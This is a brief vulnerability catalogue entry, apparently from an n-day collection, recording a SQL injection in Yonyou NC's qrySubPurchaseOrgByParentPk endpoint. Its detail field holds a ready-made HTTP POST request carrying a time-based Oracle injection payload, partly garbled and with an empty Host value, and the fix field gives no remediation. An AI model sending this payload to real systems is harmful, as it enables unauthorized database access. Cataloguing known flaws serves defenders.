vendor = "用友"
name = "用友NC qrySubPurchaseOrgByParentPk 存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/ebvp/register/qrySubPurchaseOrgByParentPk"
detail = "POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1Host: Content-Type: application/x-www-form-urlencoded pk_group=1' AND 1=DBMS_PIPE.DS',5) --"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
